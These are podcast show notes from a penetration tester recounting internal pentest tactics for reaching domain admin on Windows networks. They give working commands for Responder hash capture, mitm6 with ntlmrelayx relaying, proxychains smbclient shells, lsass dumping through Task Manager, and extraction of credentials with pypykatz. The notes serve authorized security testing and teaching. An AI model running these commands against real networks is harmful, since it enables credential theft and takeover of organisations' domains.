7MS #423: Tales of Internal Pentest Pwnage - Part 18

This is an especially fun tale of pentest pwnage because it involves D.D.A.D. (Double Domain Admin Dance) and varying T.T.D.A. (Time to Domain Admin). The key takeaways I want to share from these tests are as follows:

• Responder.py -i eth0 -rPv is AWESOME. It can make the network rain hashes like manna from heaven!
• Testing the egress firewall is easy with this script. Consider this SANS article for guidance on ports to lock down.
• Testing for MS14-025 is easy with this site.
• mitm6 and ntlmrelayx can work really well together to rain shells if you follow this article. It's especially handy/focused when you create a targets.txt that looks something like this:

smb://CORP\Administrator@192.168.195.2 smb://CORP\Administrator@192.168.195.3 smb://CORP\brian.admin@192.168.195.7 192.168.195.7 192.168.195.10

Then save that as your targets.txt and run ntlmrelayx with ./ntlmrelayx.py -tf /targets.txt -socks -smb2support. From there, once you get active socks connections, you can connect to them directly with a full interactive shell with something like proxychains smbclient //192.168.195.2/ -U CORP/brian.admin

• I ran into a weird issue with CrackMapExec where the --local-auth flag didn't seem to be working so I ended up trying the binary version and then it worked like a champ!

• Looking to dump lsass a "clean" way? Try RDPing in directly to the victim machine, opening up taskmgr.exe, click the Details tab, then right-click lsass.exe and choose Create dump file and bam, done.

• Wanna spin up a quick SMB share from your Kali box? Try smbserver.py -smb2support share /share

• Then, once you've pulled back the lsass.dmp file, you can rip through it easily with:

pip3 install pypykatz sudo pypykatz lsa minidump lsass.dmp > lsass.txt

Then comb through lsass.txt and hopefully there will be some delicious and nutritious DA creds there for you to much on!